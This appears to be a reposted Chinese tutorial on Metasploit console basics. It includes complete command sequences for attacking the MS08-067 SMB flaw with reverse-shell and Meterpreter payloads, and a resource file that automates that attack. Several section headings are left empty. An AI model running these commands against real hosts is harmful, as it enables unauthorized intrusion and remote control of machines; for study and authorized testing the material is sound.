5-渗透攻击之旅
来源:互联网 发布:玩具机械战警如何编程 编辑:程序博客网 时间:2024/06/05 03:18
一、渗透攻击基础
Metasploit框架中包含数百个模块,在MSF终端中运行show命令会将所有的模块显示出来。
1、msf>show exploits
显示Metasploit框架中所有可用的渗透攻击模块。
Metasploit团队不断开发新的渗透攻击模块,不断更新
2、msf>show auxiliary
显示所有的辅助模块以及它们的用途。
3、msf>show options
当选择一个模块后输入,会列出所有这个模块所需的参数。
没有选择任何模块,则会显示所有的全局参数。
输入back命令,返回到Metasploit的上一个状态。
msf>use windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi)>backmsf>
想要查看某个特定的渗透攻击、辅助或攻击载荷模块时,使用search命令。
发起一次针对SQL数据库的攻击。
msf>search mssql
寻找和ms08_067_netapi漏洞相关的模块。
msf>search ms08_067_netapi
找到攻击模块后,使用use命令加载。
msf>use windows/smb/ms08_067_netapi
Notice:无论在哪个模块运行,都可以使用search和use跳转到另一个模块。
4、msf>show payloads
当在当前模块下输入,Metasploit只会将与当前模块兼容的攻击载荷显示出来。
未选择模块,命令显示所有处于活动状态的攻击载荷。
Metasploit会根据环境识别出可在一次特定的渗透攻击中使用的攻击载荷。
msf exploit(ms08_067_netapi)>show payloads
设置要使用的payload
msf exploit(ms08_067_netapi)>set payload windows/shell/reverse_tcpmsf exploit(ms08_067_netapi)>show options
Payload options显示了攻击载荷详细信息。
5、msf>show targets
Metasploit的渗透攻击模块能够列出受到漏洞影响目标系统的类型(包括补丁级别、语言版本、安全机制等)
msf exploit(ms08_067_netapi)>show targets
ID 0–自动选择目标,攻击目标列表中的一个选项。
6、setg和unsetg
对全局参数进行设置或清除。
7、save
setg读对全局参数进行设置后,使用save进行保存。
msf exploit(ms08_067_netapi)>setg RHOST 192.168.1.0msf exploit(ms08_067_netapi)>save
二、第一次渗透攻击
三、Ubuntu渗透攻击
四、全端口攻击载荷
五、资源文件
MSF终端内包含一系列自动化命令的脚本文件。实际是可以在MSF终端执行的命令列表,列表中的命令按顺序执行。
resource命令载入资源文件,或在OS命令行环境使用-r标志资源文件作为MSF终端的一个参数进行传递。
创建显示Metasploit版本,载入声音的资源文件:
root@bt:/opt/framework3/msf3/ echo version>resource.rcroot@bt:/opt/framework3/msf3/ echo load sounds>>resource.rcroot@bt:/opt/framework3/msf3/ msfconsole -r resource.rc
version和load命令被写入资源文件,-r将资源文件载入。
结果:
自动化对某个主机发起攻击的资源文件,autoexploit.rc。
root@bt:/opt/framework3/msf3/ echo use windows/smb/ms08_067_netapi>autoexploit.rcroot@bt:/opt/framework3/msf3/echo set RHOST 192.168.1.155 >>autoexploit.rcroot@bt:/opt/framework3/msf3/echo set PAYLOAD windows/meterpreter/reverse_tcp >>autoexploit.rcroot@bt:/opt/framework3/msf3/echo set LHOST 102.168.1.101>>autoexploit.rcroot@bt:/opt/framework3/msf3/echo exploit>>autoexploit.rcroot@bt:/opt/framework3/msf3/msfconsolemsf>resource autoexploit.rc
结果:
- 5-渗透攻击之旅
- Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具
- 渗透测试漏洞利用之漏洞攻击
- SQL注入攻击之SQLMap渗透测试
- SQLMAP渗透笔记之Mysql Dos攻击
- 无线网络渗透之旅
- [渗透测试] 旁注攻击
- [渗透测试] DOS攻击
- 渗透攻击(NT/2000系统)
- web渗透—xss攻击
- 渗透测试攻击推荐之Burp Suite 从入门到放弃……
- [渗透测试] 渗透测试中的上传攻击技巧
- 渗透攻击必用命令与步骤
- metasploit文件格式漏洞渗透攻击(失败)
- Metasploit渗透Ubuntu 12.04攻击测试演练
- 渗透测试:SQL注入攻击(ASP)
- 模仿黑客攻击的渗透测试流程
- Odat渗透攻击oracle资源链接
- mysql无法创建数据库
- 删除redo所有日志,数据库无法启动
- 删除undotbs后,数据库无法启动
- 使用strace工具跟踪系统调用和信号
- ORACLE RAC crs 无法启动
- 5-渗透攻击之旅
- Linux 挂载硬盘方法
- Oracle数据迁移至MySQL
- Oracle private dblink…
- MySQL复制
- Oracle DBLINK 抽数以及…
- MySQL Server-id的作用
- MySQL 简洁连接数据库方式
- Oracle redo 日志切换时间频率